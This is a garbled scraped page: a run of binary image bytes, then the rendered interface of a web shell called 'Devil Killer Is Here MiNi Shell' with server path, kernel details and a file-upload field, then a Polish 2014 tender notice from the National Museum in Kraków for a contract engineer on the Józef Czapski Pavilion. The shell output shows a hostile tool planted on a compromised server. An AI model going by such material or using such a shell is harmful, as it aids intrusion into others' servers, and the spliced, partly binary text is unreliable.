JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140417/84751-N-2014.html

<p class="kh_header"><b>Kraków: Pełnienie funkcji Inżyniera Kontraktu w projekcie Budowa Pawilonu Józefa Czapskiego w Muzeum Narodowym w Krakowie</b><br>
<b>Numer ogłoszenia: 84751 - 2014; data zamieszczenia: 17.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 12 43 35 621, faks 12 43 35 555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu w projekcie Budowa Pawilonu Józefa Czapskiego w Muzeum Narodowym w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia.

Przedmiotem zamówienia jest pełnienie obowiązków Inżyniera Kontraktu przy budowie Pawilonu Józefa Czapskiego wraz z zagospodarowaniem terenu oraz wyposażeniem obiektu. 
Budowa Pawilonu realizowana będzie w ramach projektu pn.: Budowa Pawilonu Józefa Czapskiego w Muzeum Narodowym w Krakowie, realizowanego  zgodnie  z wytycznymi programu Konserwacja i  rewitalizacja dziedzictwa kulturowego w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.

Prace budowlano-konserwatorskie obejmują budowę pawilonu muzealno- wystawienniczego Józefa Czapskiego, konserwację zabytkowych murów wraz z zagospodarowaniem terenu tylnej części działki, położonej w Krakowie przy ul. Piłsudskiego 14 - działka 6/4 i 6/6 Pawilon ten będzie stanowił część kompleksu budynków Muzeum Narodowego w Krakowie - oddziału Muzeum im. Emeryka Hutten-Czapskiego. Budynki te położone są przy ul. Piłsudskiego 10,12 i 14. W skład oddziału oprócz projektowanego pawilonu wchodzą: Pałac Czapskich,  Kamienica Łozińskich, Oficyna Kamienicy Łozińskich (budynki po remoncie).

2. Ogólne informacje o obiekcie.

Budynki (projektowany oraz wymienione w pkt. 1.2.) tworzą zespół wzajemnie powiązanych i uzupełniających się obiektów. Budynek Pawilonu Józefa Czapskiego będzie miał funkcję wystawienniczą i muzealną. Oprócz sal wystaw czasowych i stałych na parterze budynku zaprojektowano kawiarnię kultury. Planowany obiekt stanowi pawilon wystawienniczy o trzech kondygnacjach nadziemnych, z wysuniętą przeszkloną częścią parteru. Obiekt jest podpiwniczony. Na parterze budynku, zlokalizowano strefę wejścia wraz z punktem informacyjnym oraz kawiarnię kultury. W piwnicach- szatnię, sanitariaty, pomieszczenia techniczne i gospodarcze. Na drugiej i trzeciej kondygnacji- pomieszczenia wystawowe i muzealne. Na dachu budynku - taras widokowy.

2.1Charakterystyka obiektu.

W obiekcie zaprojektowano następujące instalacje:
- instalacje elektryczne;
- instalacja systemu BMS i monitoringu wycieków;
- instalacje audiowizualne;
- instalacje sieci logicznej;
- instalacje systemu sygnalizacji pożaru i sterowania oddymianiem klatki;
- instalacje systemu sygnalizacji włamania i napadu, systemu antykradzieżowego,
- obserwacji telewizyjnej oraz kontroli dostępu;
- Instalacje i przyłącza centralnego ogrzewania;
- Instalacje zewnętrzne i wewnętrzne wod-kan;
- Instalacja wentylacji i klimatyzacji
- Instalacje będą sterowane przez system BMS, ze stałym nadzorem, w budynku Pałacu
Czapskich.
W budynku zaprojektowano 2 szyby instalacyjne, z możliwością dostępu na każdej kondygnacji lub z półpodestów schodowych. Na tarasie budynku wydzielono za pomocą ażurowego ogrodzenia, z pnączami stałozielonymi - taras techniczny, gdzie umieszczone będą urządzenia techniczne, głównie centrale wentylacyjne.
Zaplanowano w budynku dźwig elektryczny, bezreduktorowy o napędzie pasowym z drzwiami automatycznie otwieranymi. Dźwig obsługuje wszystkie kondygnacje budynku i taras dachowy (5 przystanków).
Ponadto zaplanowano prace konserwatorskie dotyczące zabytkowego muru, a także prace związane z zagospodarowaniem terenu.
Przewiduje się wyburzenie małego obiektu gospodarczego znajdującego się na końcu działki (kompostownik), a także przekładkę sieci teletechnicznej (zmiana przebiegu światłowodu na terenie działki).
Na terenie przewiduje się prowadzenie: kabla energetycznego, przyłącza kanalizacji deszczowej, kanalizacji sanitarnej, ciepłociągu oraz sieci teletechnicznej między pawilonem Czapskich a Oficyną Kamienicy Łozińskich.
Teren ogrodu będzie w całości oświetlony.
Projektuje się wokół budynku trawniki wzmocnione (do intensywnego ruchu pieszego) i zieleń ozdobną niską oraz pnącza ozdobne, wzdłuż murów stanowiących ogrodzenie działki.

Charakterystyczne parametry budowanego obiektu:
Powierzchnia zabudowy 201,20 m2
Powierzchnia użytkowa 611,50 m2
Kubatura 2796,8 m3
Wysokość budynku 10.6 m
Długość budynku 18,85 m
Szerokość budynku 10,15 - 11,8 m.

2.2. Termin realizacji robót budowlano- konserwatorskich i instalacyjnych, oraz wyposażenie budynku.

do 31.11.2015- ukończenie robót budowlano- konserwatorskich i instalacyjnych przez wykonawcę robót budowlanych.

do 29.02.2016- uzyskanie decyzji o pozwoleniu na użytkowanie budynku i wyposażenie budynku

2.3 zakres obowiązków Inżyniera Kontraktu.

Do zakresu obowiązków Inżyniera Kontraktu będzie należało: 
- pełnienie obowiązków Inżyniera Kontraktu dla robót budowlano- konserwatorskich i instalacyjnych.
Roboty budowlano-konserwatorskie będą realizowane w oparciu o WARUNKI KONTRAKTOWE DLA BUDOWY dla ROBÓT INŻYNIERYJNO-BUDOWLANYCH PROJEKTOWANYCH PRZEZ ZAMAWIAJĄCEGO, (wszystkie dostępne wydania), przygotowane i opublikowane przez Międzynarodową Federację Inżynierów-Konsultantów (Federation Internationale des Ingenieurs-Conseils- FIDIC), P.O. Box 86, CH-1000 Lausanne 12, Szwajcaria oraz Warunki Szczególne które zmieniają lub/i uzupełniają postanowienia Warunków Ogólnych.  
- pełnienie funkcji Inspektora Nadzoru Inwestorskiego w rozumieniu i zgodnie z zapisami Ustawy z dnia 7.7.1994 r. Prawo budowlane (tj. Dz.U.2013 poz.1409),
- pełnienie funkcji Koordynatora czynności inspektorów nadzoru inwestycyjnego,
- nadzór nad poprawnością wykonania inwestycji;
- nadzór nad wyposażeniem budynku
- raportowanie i nadzór nad realizacją kontraktu zgodnie z  harmonogramem rzeczowo-finansowym projektu.

Szczegółowy zakres zamówienia określa opis przedmiotu zamówienia (Załącznik 1 specyfikacji).

3. Termin realizacji  zamówienia:  

Od dnia zawarcia umowy do dnia 31.03.2016.
Przez termin realizacji rozumie się  zatwierdzenie przez Zamawiającego raportu końcowego.

4. Miejsce realizacji zamówienia: 
Obszar realizacji robót budowlanych w projekcie Budowa Pawilonu Józefa Czapskiego w Muzeum Narodowym w Krakowie, przy ul. Piłsudskiego 14

5. Szacunkowa wartość zamówienia: 600.000,00 zł netto..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości 18.000,00 zł (słownie: osiemnaście tysięcy złotych 00/100).
Wadium wnosi się przed upływem terminu składania ofert. 
Wadium może być wnoszone w:
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm).

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 
62 1030 1508 0000 0008 1536 0001 CITI HANDLOWY - Bank Handlowy w Warszawie.

W pozostałych formach wadium należy złożyć w siedzibie zamawiającego Al. 3-go Maja 1, 30 -062 Kraków, pok. 048 w dziale księgowości. Wadium należy złożyć w zaklejonej kopercie opisanej: wadium przetargowe:EP-271-PJC-11/14.

Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem, że Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.

Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium po wyborze oferty najkorzystniejszej lub po unieważnieniu postępowania., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania zostaną dopuszczeni wykonawcy którzy Wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej jedną usługę polegającą na nadzorowaniu wykonania robót budowlanych  wielobranżowych o wartości minimum 5.000.000,00 zł brutto, obejmujących co najmniej branżę budowlaną, sanitarną, elektryczną i niskoprądową. Nadzór na realizacją robót budowlanych obejmować musiał: nadzór inwestorski w rozumieniu ustawy Prawo budowlane; zarządzenie budową pod względem organizacyjnym od jej rozpoczęcia do pełnego zakończenia. 

W celu wykazania spełniania warunku udziału w postępowaniu Wykonawca zobowiązany jest przedstawić wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności  jest krótszy- w tym okresie), tj. co najmniej jednej usługi polegającej na nadzorowaniu wykonania robót budowlanych  wielobranżowych o wartości minimum 5.000.000,00 zł, obejmujących co najmniej branżę budowlaną, sanitarną, elektryczną i niskoprądową. Nadzór na realizacją robót budowlanych obejmować musiał: nadzór inwestorski w rozumieniu ustawy Prawo budowlane, zarządzenie budową względem organizacyjnym od jej rozpoczęcia do pełnego zakończenia.
załącznik 5 specyfikacji wraz z dowodami o których mowa w §1 ust.2 pkt. 1 albo 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r.  w sprawie rodzaju  dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013, poz.231), określającymi czy usługi te zostały wykonane lub są wykonywane należycie. 

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie (co oznacza że spełnienie warunku udziału w postępowaniu przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego jest spełnieniem warunku udziału w postępowaniu). Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, czy będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów. W tym celu Wykonawca oprócz przedstawienia pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia zobowiązany jest przedstawić dokumenty określające: - zakres dostępnych wykonawcy zasobów innego podmiotu; - sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia; charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem; - zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania zostaną dopuszczeni wykonawcy którzy dysponują osobami zdolnymi do wykonania zamówienia, tj.: 

1)Inżynier Rezydent:
- doświadczenie w nadzorowaniu minimum 1 roboty budowlanej wielobranżowej, tj. co najmniej w branżach konstrukcyjno-budowlanej, sanitarnej i elektrycznej. Nadzór należy rozumieć jako pełnienie funkcji Inżyniera Rezydenta lub kierownika lub inspektora nadzoru itp. prowadzonej roboty budowlanej w zakresie zgodności jej wykonania z przepisami ustawy Prawo Budowlane i obejmujące nadzór nad pracą inspektorów nadzoru oraz rozliczenie finansowe tej roboty. Doświadczenie Inżyniera Rezydenta wykazywane na potrzeby niniejszego postępowania musi obejmować robotę budowlaną oraz usługę świadczoną przez Inżyniera Rezydenta jako wykonaną i odebraną przez zamawiającego.  

2) Inspektor nadzoru w branży konstrukcyjnej:
- uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi bez ograniczeń;
- uprawnienia do wykonywania nadzoru inwestorskiego nad robotami budowlanymi w obiektach zabytkowych określone w § 24.2. rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U. 2011. Nr 165 poz. 987) tj. posiadanie minimum 2 letniej praktyki zawodowej na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków.

3)Inspektor nadzoru w branży instalacji sanitarnych:
- uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz 
- uprawnienia do wykonywania nadzoru inwestorskiego nad robotami budowlanymi w obiektach zabytkowych określone w § 24.2. rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U. 2011. Nr 165 poz. 987) tj. posiadanie minimum 2 letniej praktyki zawodowej na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków.


4)Inspektor nadzoru w branży elektrycznej:
- uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz 
- uprawnienia do wykonywania nadzoru inwestorskiego nad robotami budowlanymi w obiektach zabytkowych określone w § 24.2. rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U. 2011. Nr 165 poz. 987) tj. posiadanie minimum 2 letniej praktyki zawodowej na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków.


5)Osoba nadzorująca prace związane z systemem zabezpieczeń:
- wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego, który uprawnia do wykonywania czynności, o których mowa w art. 3 pkt. 2. ustawy z dn. 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz.U. z 2005 r. nr 145 poz. 1221 ze zm.) tj. zabezpieczenia technicznego, polegającego na: montażu elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia, oraz eksploatacji, konserwacji i naprawach w miejscach ich zainstalowania, montażu urządzeń i środków mechanicznego zabezpieczenia oraz ich eksploatacji, konserwacji, naprawach i awaryjnym otwieraniu w miejscach zainstalowania. 

Wskazane powyżej wymagania wynikają z wymogów określonych w:
- Rozporządzeniu Ministra Transportu i Budownictwa z dn. 26 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. nr 83 poz. 578),
- Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku (Dz.U. nr 165 poz. 987),
- Ustawie z dn. 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz.U. 2005 nr 145 poz. 1221 ze zm.).

Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U.2013 poz.1409). Uprawnienia budowlane (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania. 

Zgodnie z art. 12 a ustawy Prawo budowlane z dnia 7 lipca 1994r. (tj. Dz.U.2013 poz.1409) w zakresie warunku udziału w postępowaniu określonego powyżej, w odniesieniu do obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), uznaje się uprawnienia do wykonywania zawodu, które spełniają warunki określone w Ustawie z dn. 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394).

W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca zobowiązany jest przedstawić: wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie (co oznacza że spełnienie warunku udziału w postępowaniu przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego jest spełnieniem warunku udziału w postępowaniu). Wykonawca może polegać na osobach zdolnych do wykonania innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, czy będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów. W tym celu Wykonawca oprócz przedstawienia pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia zobowiązany jest przedstawić dokumenty określając: zakres dostępnych wykonawcy zasobów innego podmiotu; sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia; charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem; zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania zostaną dopuszczeni Wykonawcy którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 300.000,00 zł od jednego zdarzenia. Na potwierdzenie tego warunku Wykonawca zobowiązany jest do przedstawienia opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość 300.000,00 zł od jednego zdarzenia. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie. Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym 